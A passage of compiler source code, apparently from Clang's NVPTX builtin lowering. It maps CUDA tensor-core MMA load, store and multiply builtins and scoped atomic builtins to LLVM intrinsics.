return MMA_LDST(8, m8n32k16_load_a_f16);
case NVPTX::BI__hmma_m8n32k16_ld_b:
return MMA_LDST(8, m8n32k16_load_b_f16);
case NVPTX::BI__hmma_m8n32k16_ld_c_f16:
return MMA_LDST(4, m8n32k16_load_c_f16);
case NVPTX::BI__hmma_m8n32k16_ld_c_f32:
return MMA_LDST(8, m8n32k16_load_c_f32);
// Integer MMA loads
case NVPTX::BI__imma_m16n16k16_ld_a_s8:
return MMA_LDST(2, m16n16k16_load_a_s8);
case NVPTX::BI__imma_m16n16k16_ld_a_u8:
return MMA_LDST(2, m16n16k16_load_a_u8);
case NVPTX::BI__imma_m16n16k16_ld_b_s8:
return MMA_LDST(2, m16n16k16_load_b_s8);
case NVPTX::BI__imma_m16n16k16_ld_b_u8:
return MMA_LDST(2, m16n16k16_load_b_u8);
case NVPTX::BI__imma_m16n16k16_ld_c:
return MMA_LDST(8, m16n16k16_load_c_s32);
case NVPTX::BI__imma_m32n8k16_ld_a_s8:
return MMA_LDST(4, m32n8k16_load_a_s8);
case NVPTX::BI__imma_m32n8k16_ld_a_u8:
return MMA_LDST(4, m32n8k16_load_a_u8);
case NVPTX::BI__imma_m32n8k16_ld_b_s8:
return MMA_LDST(1, m32n8k16_load_b_s8);
case NVPTX::BI__imma_m32n8k16_ld_b_u8:
return MMA_LDST(1, m32n8k16_load_b_u8);
case NVPTX::BI__imma_m32n8k16_ld_c:
return MMA_LDST(8, m32n8k16_load_c_s32);
case NVPTX::BI__imma_m8n32k16_ld_a_s8:
return MMA_LDST(1, m8n32k16_load_a_s8);
case NVPTX::BI__imma_m8n32k16_ld_a_u8:
return MMA_LDST(1, m8n32k16_load_a_u8);
case NVPTX::BI__imma_m8n32k16_ld_b_s8:
return MMA_LDST(4, m8n32k16_load_b_s8);
case NVPTX::BI__imma_m8n32k16_ld_b_u8:
return MMA_LDST(4, m8n32k16_load_b_u8);
case NVPTX::BI__imma_m8n32k16_ld_c:
return MMA_LDST(8, m8n32k16_load_c_s32);
// Sub-integer MMA loads.
// Only row/col layout is supported by A/B fragments.
case NVPTX::BI__imma_m8n8k32_ld_a_s4:
return {1, 0, MMA_INTR(m8n8k32_load_a_s4, row)};
case NVPTX::BI__imma_m8n8k32_ld_a_u4:
return {1, 0, MMA_INTR(m8n8k32_load_a_u4, row)};
case NVPTX::BI__imma_m8n8k32_ld_b_s4:
return {1, MMA_INTR(m8n8k32_load_b_s4, col), 0};
case NVPTX::BI__imma_m8n8k32_ld_b_u4:
return {1, MMA_INTR(m8n8k32_load_b_u4, col), 0};
case NVPTX::BI__imma_m8n8k32_ld_c:
return MMA_LDST(2, m8n8k32_load_c_s32);
case NVPTX::BI__bmma_m8n8k128_ld_a_b1:
return {1, 0, MMA_INTR(m8n8k128_load_a_b1, row)};
case NVPTX::BI__bmma_m8n8k128_ld_b_b1:
return {1, MMA_INTR(m8n8k128_load_b_b1, col), 0};
case NVPTX::BI__bmma_m8n8k128_ld_c:
return MMA_LDST(2, m8n8k128_load_c_s32);
// Double MMA loads
case NVPTX::BI__dmma_m8n8k4_ld_a:
return MMA_LDST(1, m8n8k4_load_a_f64);
case NVPTX::BI__dmma_m8n8k4_ld_b:
return MMA_LDST(1, m8n8k4_load_b_f64);
case NVPTX::BI__dmma_m8n8k4_ld_c:
return MMA_LDST(2, m8n8k4_load_c_f64);
// Alternate float MMA loads
case NVPTX::BI__mma_bf16_m16n16k16_ld_a:
return MMA_LDST(4, m16n16k16_load_a_bf16);
case NVPTX::BI__mma_bf16_m16n16k16_ld_b:
return MMA_LDST(4, m16n16k16_load_b_bf16);
case NVPTX::BI__mma_bf16_m8n32k16_ld_a:
return MMA_LDST(2, m8n32k16_load_a_bf16);
case NVPTX::BI__mma_bf16_m8n32k16_ld_b:
return MMA_LDST(8, m8n32k16_load_b_bf16);
case NVPTX::BI__mma_bf16_m32n8k16_ld_a:
return MMA_LDST(8, m32n8k16_load_a_bf16);
case NVPTX::BI__mma_bf16_m32n8k16_ld_b:
return MMA_LDST(2, m32n8k16_load_b_bf16);
case NVPTX::BI__mma_tf32_m16n16k8_ld_a:
return MMA_LDST(4, m16n16k8_load_a_tf32);
case NVPTX::BI__mma_tf32_m16n16k8_ld_b:
return MMA_LDST(2, m16n16k8_load_b_tf32);
case NVPTX::BI__mma_tf32_m16n16k8_ld_c:
return MMA_LDST(8, m16n16k8_load_c_f32);
// NOTE: We need to follow inconsitent naming scheme used by NVCC. Unlike
// PTX and LLVM IR where stores always use fragment D, NVCC builtins always
// use fragment C for both loads and stores.
// FP MMA stores.
case NVPTX::BI__hmma_m16n16k16_st_c_f16:
return MMA_LDST(4, m16n16k16_store_d_f16);
case NVPTX::BI__hmma_m16n16k16_st_c_f32:
return MMA_LDST(8, m16n16k16_store_d_f32);
case NVPTX::BI__hmma_m32n8k16_st_c_f16:
return MMA_LDST(4, m32n8k16_store_d_f16);
case NVPTX::BI__hmma_m32n8k16_st_c_f32:
return MMA_LDST(8, m32n8k16_store_d_f32);
case NVPTX::BI__hmma_m8n32k16_st_c_f16:
return MMA_LDST(4, m8n32k16_store_d_f16);
case NVPTX::BI__hmma_m8n32k16_st_c_f32:
return MMA_LDST(8, m8n32k16_store_d_f32);
// Integer and sub-integer MMA stores.
// Another naming quirk. Unlike other MMA builtins that use PTX types in the
// name, integer loads/stores use LLVM's i32.
case NVPTX::BI__imma_m16n16k16_st_c_i32:
return MMA_LDST(8, m16n16k16_store_d_s32);
case NVPTX::BI__imma_m32n8k16_st_c_i32:
return MMA_LDST(8, m32n8k16_store_d_s32);
case NVPTX::BI__imma_m8n32k16_st_c_i32:
return MMA_LDST(8, m8n32k16_store_d_s32);
case NVPTX::BI__imma_m8n8k32_st_c_i32:
return MMA_LDST(2, m8n8k32_store_d_s32);
case NVPTX::BI__bmma_m8n8k128_st_c_i32:
return MMA_LDST(2, m8n8k128_store_d_s32);
// Double MMA store
case NVPTX::BI__dmma_m8n8k4_st_c_f64:
return MMA_LDST(2, m8n8k4_store_d_f64);
// Alternate float MMA store
case NVPTX::BI__mma_m16n16k8_st_c_f32:
return MMA_LDST(8, m16n16k8_store_d_f32);
default:
llvm_unreachable("Unknown MMA builtin");
}
}
#undef MMA_LDST
#undef MMA_INTR
struct NVPTXMmaInfo {
unsigned NumEltsA;
unsigned NumEltsB;
unsigned NumEltsC;
unsigned NumEltsD;
// Variants are ordered by layout-A/layout-B/satf, where 'row' has priority
// over 'col' for layout. The index of non-satf variants is expected to match
// the undocumented layout constants used by CUDA's mma.hpp.
std::array<unsigned, 8> Variants;
unsigned getMMAIntrinsic(int Layout, bool Satf) {
unsigned Index = Layout + 4 * Satf;
if (Index >= Variants.size())
return 0;
return Variants[Index];
}
};
// Returns an intrinsic that matches Layout and Satf for valid combinations of
// Layout and Satf, 0 otherwise.
static NVPTXMmaInfo getNVPTXMmaInfo(unsigned BuiltinID) {
// clang-format off
#define MMA_VARIANTS(geom, type) \
Intrinsic::nvvm_wmma_##geom##_mma_row_row_##type, \
Intrinsic::nvvm_wmma_##geom##_mma_row_col_##type, \
Intrinsic::nvvm_wmma_##geom##_mma_col_row_##type, \
Intrinsic::nvvm_wmma_##geom##_mma_col_col_##type
#define MMA_SATF_VARIANTS(geom, type) \
MMA_VARIANTS(geom, type), \
Intrinsic::nvvm_wmma_##geom##_mma_row_row_##type##_satfinite, \
Intrinsic::nvvm_wmma_##geom##_mma_row_col_##type##_satfinite, \
Intrinsic::nvvm_wmma_##geom##_mma_col_row_##type##_satfinite, \
Intrinsic::nvvm_wmma_##geom##_mma_col_col_##type##_satfinite
// Sub-integer MMA only supports row.col layout.
#define MMA_VARIANTS_I4(geom, type) \
0, \
Intrinsic::nvvm_wmma_##geom##_mma_row_col_##type, \
0, \
0, \
0, \
Intrinsic::nvvm_wmma_##geom##_mma_row_col_##type##_satfinite, \
0, \
0
// b1 MMA does not support .satfinite.
#define MMA_VARIANTS_B1_XOR(geom, type) \
0, \
Intrinsic::nvvm_wmma_##geom##_mma_xor_popc_row_col_##type, \
0, \
0, \
0, \
0, \
0, \
0
#define MMA_VARIANTS_B1_AND(geom, type) \
0, \
Intrinsic::nvvm_wmma_##geom##_mma_and_popc_row_col_##type, \
0, \
0, \
0, \
0, \
0, \
0
// clang-format on
switch (BuiltinID) {
// FP MMA
// Note that 'type' argument of MMA_SATF_VARIANTS uses D_C notation, while
// NumEltsN of return value are ordered as A,B,C,D.
case NVPTX::BI__hmma_m16n16k16_mma_f16f16:
return {8, 8, 4, 4, {{MMA_SATF_VARIANTS(m16n16k16, f16_f16)}}};
case NVPTX::BI__hmma_m16n16k16_mma_f32f16:
return {8, 8, 4, 8, {{MMA_SATF_VARIANTS(m16n16k16, f32_f16)}}};
case NVPTX::BI__hmma_m16n16k16_mma_f16f32:
return {8, 8, 8, 4, {{MMA_SATF_VARIANTS(m16n16k16, f16_f32)}}};
case NVPTX::BI__hmma_m16n16k16_mma_f32f32:
return {8, 8, 8, 8, {{MMA_SATF_VARIANTS(m16n16k16, f32_f32)}}};
case NVPTX::BI__hmma_m32n8k16_mma_f16f16:
return {8, 8, 4, 4, {{MMA_SATF_VARIANTS(m32n8k16, f16_f16)}}};
case NVPTX::BI__hmma_m32n8k16_mma_f32f16:
return {8, 8, 4, 8, {{MMA_SATF_VARIANTS(m32n8k16, f32_f16)}}};
case NVPTX::BI__hmma_m32n8k16_mma_f16f32:
return {8, 8, 8, 4, {{MMA_SATF_VARIANTS(m32n8k16, f16_f32)}}};
case NVPTX::BI__hmma_m32n8k16_mma_f32f32:
return {8, 8, 8, 8, {{MMA_SATF_VARIANTS(m32n8k16, f32_f32)}}};
case NVPTX::BI__hmma_m8n32k16_mma_f16f16:
return {8, 8, 4, 4, {{MMA_SATF_VARIANTS(m8n32k16, f16_f16)}}};
case NVPTX::BI__hmma_m8n32k16_mma_f32f16:
return {8, 8, 4, 8, {{MMA_SATF_VARIANTS(m8n32k16, f32_f16)}}};
case NVPTX::BI__hmma_m8n32k16_mma_f16f32:
return {8, 8, 8, 4, {{MMA_SATF_VARIANTS(m8n32k16, f16_f32)}}};
case NVPTX::BI__hmma_m8n32k16_mma_f32f32:
return {8, 8, 8, 8, {{MMA_SATF_VARIANTS(m8n32k16, f32_f32)}}};
// Integer MMA
case NVPTX::BI__imma_m16n16k16_mma_s8:
return {2, 2, 8, 8, {{MMA_SATF_VARIANTS(m16n16k16, s8)}}};
case NVPTX::BI__imma_m16n16k16_mma_u8:
return {2, 2, 8, 8, {{MMA_SATF_VARIANTS(m16n16k16, u8)}}};
case NVPTX::BI__imma_m32n8k16_mma_s8:
return {4, 1, 8, 8, {{MMA_SATF_VARIANTS(m32n8k16, s8)}}};
case NVPTX::BI__imma_m32n8k16_mma_u8:
return {4, 1, 8, 8, {{MMA_SATF_VARIANTS(m32n8k16, u8)}}};
case NVPTX::BI__imma_m8n32k16_mma_s8:
return {1, 4, 8, 8, {{MMA_SATF_VARIANTS(m8n32k16, s8)}}};
case NVPTX::BI__imma_m8n32k16_mma_u8:
return {1, 4, 8, 8, {{MMA_SATF_VARIANTS(m8n32k16, u8)}}};
// Sub-integer MMA
case NVPTX::BI__imma_m8n8k32_mma_s4:
return {1, 1, 2, 2, {{MMA_VARIANTS_I4(m8n8k32, s4)}}};
case NVPTX::BI__imma_m8n8k32_mma_u4:
return {1, 1, 2, 2, {{MMA_VARIANTS_I4(m8n8k32, u4)}}};
case NVPTX::BI__bmma_m8n8k128_mma_xor_popc_b1:
return {1, 1, 2, 2, {{MMA_VARIANTS_B1_XOR(m8n8k128, b1)}}};
case NVPTX::BI__bmma_m8n8k128_mma_and_popc_b1:
return {1, 1, 2, 2, {{MMA_VARIANTS_B1_AND(m8n8k128, b1)}}};
// Double MMA
case NVPTX::BI__dmma_m8n8k4_mma_f64:
return {1, 1, 2, 2, {{MMA_VARIANTS(m8n8k4, f64)}}};
// Alternate FP MMA
case NVPTX::BI__mma_bf16_m16n16k16_mma_f32:
return {4, 4, 8, 8, {{MMA_VARIANTS(m16n16k16, bf16)}}};
case NVPTX::BI__mma_bf16_m8n32k16_mma_f32:
return {2, 8, 8, 8, {{MMA_VARIANTS(m8n32k16, bf16)}}};
case NVPTX::BI__mma_bf16_m32n8k16_mma_f32:
return {8, 2, 8, 8, {{MMA_VARIANTS(m32n8k16, bf16)}}};
case NVPTX::BI__mma_tf32_m16n16k8_mma_f32:
return {4, 4, 8, 8, {{MMA_VARIANTS(m16n16k8, tf32)}}};
default:
llvm_unreachable("Unexpected builtin ID.");
}
#undef MMA_VARIANTS
#undef MMA_SATF_VARIANTS
#undef MMA_VARIANTS_I4
#undef MMA_VARIANTS_B1_AND
#undef MMA_VARIANTS_B1_XOR
}
} // namespace
Value *
CodeGenFunction::EmitNVPTXBuiltinExpr(unsigned BuiltinID, const CallExpr *E) {
auto MakeLdg = [&](unsigned IntrinsicID) {
Value *Ptr = EmitScalarExpr(E->getArg(0));
clang::CharUnits Align =
CGM.getNaturalPointeeTypeAlignment(E->getArg(0)->getType());
return Builder.CreateCall(
CGM.getIntrinsic(IntrinsicID, {Ptr->getType()->getPointerElementType(),
Ptr->getType()}),
{Ptr, ConstantInt::get(Builder.getInt32Ty(), Align.getQuantity())});
};
auto MakeScopedAtomic = [&](unsigned IntrinsicID) {
Value *Ptr = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(
CGM.getIntrinsic(IntrinsicID, {Ptr->getType()->getPointerElementType(),
Ptr->getType()}),
{Ptr, EmitScalarExpr(E->getArg(1))});
};
auto MakeScopedCasAtomic = [&](unsigned IntrinsicID) {
Value *Ptr = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(
CGM.getIntrinsic(IntrinsicID, {Ptr->getType()->getPointerElementType(),
Ptr->getType()}),
{Ptr, EmitScalarExpr(E->getArg(1)), EmitScalarExpr(E->getArg(2))});
};
switch (BuiltinID) {
case NVPTX::BI__nvvm_atom_add_gen_i:
case NVPTX::BI__nvvm_atom_add_gen_l:
case NVPTX::BI__nvvm_atom_add_gen_ll:
return MakeBinaryAtomicValue(*this, llvm::AtomicRMWInst::Add, E);
case NVPTX::BI__nvvm_atom_sub_gen_i:
case NVPTX::BI__nvvm_atom_sub_gen_l:
case NVPTX::BI__nvvm_atom_sub_gen_ll:
return MakeBinaryAtomicValue(*this, llvm::AtomicRMWInst::Sub, E);
case NVPTX::BI__nvvm_atom_and_gen_i:
case NVPTX::BI__nvvm_atom_and_gen_l:
case NVPTX::BI__nvvm_atom_and_gen_ll:
return MakeBinaryAtomicValue(*this, llvm::AtomicRMWInst::And, E);
case NVPTX::BI__nvvm_atom_or_gen_i:
case NVPTX::BI__nvvm_atom_or_gen_l:
case NVPTX::BI__nvvm_atom_or_gen_ll:
return MakeBinaryAtomicValue(*this, llvm::AtomicRMWInst::Or, E);
case NVPTX::BI__nvvm_atom_xor_gen_i:
case NVPTX::BI__nvvm_atom_xor_gen_l:
case NVPTX::BI__nvvm_atom_xor_gen_ll:
return MakeBinaryAtomicValue(*this, llvm::AtomicRMWInst::Xor, E);
case NVPTX::BI__nvvm_atom_xchg_gen_i:
case NVPTX::BI__nvvm_atom_xchg_gen_l:
case NVPTX::BI__nvvm_atom_xchg_gen_ll:
return MakeBinaryAtomicValue(*this, llvm::AtomicRMWInst::Xchg, E);
case NVPTX::BI__nvvm_atom_max_gen_i:
case NVPTX::BI__nvvm_atom_max_gen_l:
case NVPTX::BI__nvvm_atom_max_gen_ll:
return MakeBinaryAtomicValue(*this, llvm::AtomicRMWInst::Max, E);
case NVPTX::BI__nvvm_atom_max_gen_ui:
case NVPTX::BI__nvvm_atom_max_gen_ul:
case NVPTX::BI__nvvm_atom_max_gen_ull:
return MakeBinaryAtomicValue(*this, llvm::AtomicRMWInst::UMax, E);
case NVPTX::BI__nvvm_atom_min_gen_i:
case NVPTX::BI__nvvm_atom_min_gen_l:
case NVPTX::BI__nvvm_atom_min_gen_ll:
return MakeBinaryAtomicValue(*this, llvm::AtomicRMWInst::Min, E);
case NVPTX::BI__nvvm_atom_min_gen_ui:
case NVPTX::BI__nvvm_atom_min_gen_ul:
case NVPTX::BI__nvvm_atom_min_gen_ull:
return MakeBinaryAtomicValue(*this, llvm::AtomicRMWInst::UMin, E);
case NVPTX::BI__nvvm_atom_cas_gen_i:
case NVPTX::BI__nvvm_atom_cas_gen_l:
case NVPTX::BI__nvvm_atom_cas_gen_ll:
// __nvvm_atom_cas_gen_* should return the old value rather than the
// success flag.
return MakeAtomicCmpXchgValue(*this, E, /*ReturnBool=*/false);
case NVPTX::BI__nvvm_atom_add_gen_f:
case NVPTX::BI__nvvm_atom_add_gen_d: {
Value *Ptr = EmitScalarExpr(E->getArg(0));
Value *Val = EmitScalarExpr(E->getArg(1));
return Builder.CreateAtomicRMW(llvm::AtomicRMWInst::FAdd, Ptr, Val,
AtomicOrdering::SequentiallyConsistent);
}
case NVPTX::BI__nvvm_atom_inc_gen_ui: {
Value *Ptr = EmitScalarExpr(E->getArg(0));
Value *Val = EmitScalarExpr(E->getArg(1));
Function *FnALI32 =
CGM.getIntrinsic(Intrinsic::nvvm_atomic_load_inc_32, Ptr->getType());
return Builder.CreateCall(FnALI32, {Ptr, Val});
}
case NVPTX::BI__nvvm_atom_dec_gen_ui: {
Value *Ptr = EmitScalarExpr(E->getArg(0));
Value *Val = EmitScalarExpr(E->getArg(1));
Function *FnALD32 =
CGM.getIntrinsic(Intrinsic::nvvm_atomic_load_dec_32, Ptr->getType());
return Builder.CreateCall(FnALD32, {Ptr, Val});
}
case NVPTX::BI__nvvm_ldg_c:
case NVPTX::BI__nvvm_ldg_c2:
case NVPTX::BI__nvvm_ldg_c4:
case NVPTX::BI__nvvm_ldg_s:
case NVPTX::BI__nvvm_ldg_s2:
case NVPTX::BI__nvvm_ldg_s4:
case NVPTX::BI__nvvm_ldg_i:
case NVPTX::BI__nvvm_ldg_i2:
case NVPTX::BI__nvvm_ldg_i4:
case NVPTX::BI__nvvm_ldg_l:
case NVPTX::BI__nvvm_ldg_ll:
case NVPTX::BI__nvvm_ldg_ll2:
case NVPTX::BI__nvvm_ldg_uc:
case NVPTX::BI__nvvm_ldg_uc2:
case NVPTX::BI__nvvm_ldg_uc4:
case NVPTX::BI__nvvm_ldg_us:
case NVPTX::BI__nvvm_ldg_us2:
case NVPTX::BI__nvvm_ldg_us4:
case NVPTX::BI__nvvm_ldg_ui:
case NVPTX::BI__nvvm_ldg_ui2:
case NVPTX::BI__nvvm_ldg_ui4:
case NVPTX::BI__nvvm_ldg_ul:
case NVPTX::BI__nvvm_ldg_ull:
case NVPTX::BI__nvvm_ldg_ull2:
// PTX Interoperability section 2.2: "For a vector with an even number of
// elements, its alignment is set to number of elements times the alignment
// of its member: n*alignof(t)."
return MakeLdg(Intrinsic::nvvm_ldg_global_i);
case NVPTX::BI__nvvm_ldg_f:
case NVPTX::BI__nvvm_ldg_f2:
case NVPTX::BI__nvvm_ldg_f4:
case NVPTX::BI__nvvm_ldg_d:
case NVPTX::BI__nvvm_ldg_d2:
return MakeLdg(Intrinsic::nvvm_ldg_global_f);
case NVPTX::BI__nvvm_atom_cta_add_gen_i:
case NVPTX::BI__nvvm_atom_cta_add_gen_l:
case NVPTX::BI__nvvm_atom_cta_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_cta);
case NVPTX::BI__nvvm_atom_sys_add_gen_i:
case NVPTX::BI__nvvm_atom_sys_add_gen_l:
case NVPTX::BI__nvvm_atom_sys_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_sys);
case NVPTX::BI__nvvm_atom_cta_add_gen_f:
case NVPTX::BI__nvvm_atom_cta_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_cta);
case NVPTX::BI__nvvm_atom_sys_add_gen_f:
case NVPTX::BI__nvvm_atom_sys_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_sys);
case NVPTX::BI__nvvm_atom_cta_xchg_gen_i:
case NVPTX::BI__nvvm_atom_cta_xchg_gen_l:
case NVPTX::BI__nvvm_atom_cta_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_cta);
case NVPTX::BI__nvvm_atom_sys_xchg_gen_i:
case NVPTX::BI__nvvm_atom_sys_xchg_gen_l:
case NVPTX::BI__nvvm_atom_sys_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_sys);
case NVPTX::BI__nvvm_atom_cta_max_gen_i:
case NVPTX::BI__nvvm_atom_cta_max_gen_l:
case NVPTX::BI__nvvm_atom_cta_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_cta);
case NVPTX::BI__nvvm_atom_cta_max_gen_ui:
case NVPTX::BI__nvvm_atom_cta_max_gen_ul:
case NVPTX::BI__nvvm_atom_cta_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_cta);
case NVPTX::BI__nvvm_atom_sys_max_gen_i:
case NVPTX::BI__nvvm_atom_sys_max_gen_l:
case NVPTX::BI__nvvm_atom_sys_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_sys);
case NVPTX::BI__nvvm_atom_sys_max_gen_ui:
case NVPTX::BI__nvvm_atom_sys_max_gen_ul:
case NVPTX::BI__nvvm_atom_sys_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_sys);
case NVPTX::BI__nvvm_atom_cta_min_gen_i:
case NVPTX::BI__nvvm_atom_cta_min_gen_l:
case NVPTX::BI__nvvm_atom_cta_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_cta);
case NVPTX::BI__nvvm_atom_cta_min_gen_ui:
case NVPTX::BI__nvvm_atom_cta_min_gen_ul:
case NVPTX::BI__nvvm_atom_cta_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_cta);
case NVPTX::BI__nvvm_atom_sys_min_gen_i:
case NVPTX::BI__nvvm_atom_sys_min_gen_l:
case NVPTX::BI__nvvm_atom_sys_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_sys);
case NVPTX::BI__nvvm_atom_sys_min_gen_ui:
case NVPTX::BI__nvvm_atom_sys_min_gen_ul:
case NVPTX::BI__nvvm_atom_sys_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_sys);
case NVPTX::BI__nvvm_atom_cta_inc_gen_ui:
case NVPTX::BI__nvvm_atom_cta_inc_gen_ul:
case NVPTX::BI__nvvm_atom_cta_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_cta);
case NVPTX::BI__nvvm_atom_cta_dec_gen_ui:
case NVPTX::BI__nvvm_atom_cta_dec_gen_ul:
case NVPTX::BI__nvvm_atom_cta_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_cta);
case NVPTX::BI__nvvm_atom_sys_inc_gen_ui:
case NVPTX::BI__nvvm_atom_sys_inc_gen_ul:
case NVPTX::BI__nvvm_atom_sys_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_sys);
case NVPTX::BI__nvvm_atom_sys_dec_gen_ui:
case NVPTX::BI__nvvm_atom_sys_dec_gen_ul:
case NVPTX::BI__nvvm_atom_sys_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_sys);
case NVPTX::BI__nvvm_atom_cta_and_gen_i:
case NVPTX::BI__nvvm_atom_cta_and_gen_l:
case NVPTX::BI__nvvm_atom_cta_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_cta);
case NVPTX::BI__nvvm_atom_sys_and_gen_i:
case NVPTX::BI__nvvm_atom_sys_and_gen_l:
case NVPTX::BI__nvvm_atom_sys_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_sys);
case NVPTX::BI__nvvm_atom_cta_or_gen_i:
case NVPTX::BI__nvvm_atom_cta_or_gen_l:
case NVPTX::BI__nvvm_atom_cta_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_cta);
case NVPTX::BI__nvvm_atom_sys_or_gen_i:
case NVPTX::BI__nvvm_atom_sys_or_gen_l:
case NVPTX::BI__nvvm_atom_sys_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_sys);
case NVPTX::BI__nvvm_atom_cta_xor_gen_i:
case NVPTX::BI__nvvm_atom_cta_xor_gen_l:
case NVPTX::BI__nvvm_atom_cta_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_cta);
case NVPTX::BI__nvvm_atom_sys_xor_gen_i:
case NVPTX::BI__nvvm_atom_sys_xor_gen_l:
case NVPTX::BI__nvvm_atom_sys_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_sys);
case NVPTX::BI__nvvm_atom_cta_cas_gen_i:
case NVPTX::BI__nvvm_atom_cta_cas_gen_l:
case NVPTX::BI__nvvm_atom_cta_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_cta);
case NVPTX::BI__nvvm_atom_sys_cas_gen_i:
case NVPTX::BI__nvvm_atom_sys_cas_gen_l:
case NVPTX::BI__nvvm_atom_sys_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_sys);
case NVPTX::BI__nvvm_atom_acquire_add_gen_i:
case NVPTX::BI__nvvm_atom_acquire_add_gen_l:
case NVPTX::BI__nvvm_atom_acquire_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_add_gen_f:
case NVPTX::BI__nvvm_atom_acquire_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_acquire);
case NVPTX::BI__nvvm_atom_acquire_xchg_gen_i:
case NVPTX::BI__nvvm_atom_acquire_xchg_gen_l:
case NVPTX::BI__nvvm_atom_acquire_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_max_gen_i:
case NVPTX::BI__nvvm_atom_acquire_max_gen_l:
case NVPTX::BI__nvvm_atom_acquire_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_max_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_max_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_acquire);
case NVPTX::BI__nvvm_atom_acquire_min_gen_i:
case NVPTX::BI__nvvm_atom_acquire_min_gen_l:
case NVPTX::BI__nvvm_atom_acquire_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_min_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_min_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_acquire);
case NVPTX::BI__nvvm_atom_acquire_inc_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_inc_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_dec_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_dec_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_and_gen_i:
case NVPTX::BI__nvvm_atom_acquire_and_gen_l:
case NVPTX::BI__nvvm_atom_acquire_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_or_gen_i:
case NVPTX::BI__nvvm_atom_acquire_or_gen_l:
case NVPTX::BI__nvvm_atom_acquire_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_xor_gen_i:
case NVPTX::BI__nvvm_atom_acquire_xor_gen_l:
case NVPTX::BI__nvvm_atom_acquire_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_cas_gen_i:
case NVPTX::BI__nvvm_atom_acquire_cas_gen_l:
case NVPTX::BI__nvvm_atom_acquire_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_cta_add_gen_i:
case NVPTX::BI__nvvm_atom_acquire_cta_add_gen_l:
case NVPTX::BI__nvvm_atom_acquire_cta_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_add_gen_i:
case NVPTX::BI__nvvm_atom_acquire_sys_add_gen_l:
case NVPTX::BI__nvvm_atom_acquire_sys_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_add_gen_f:
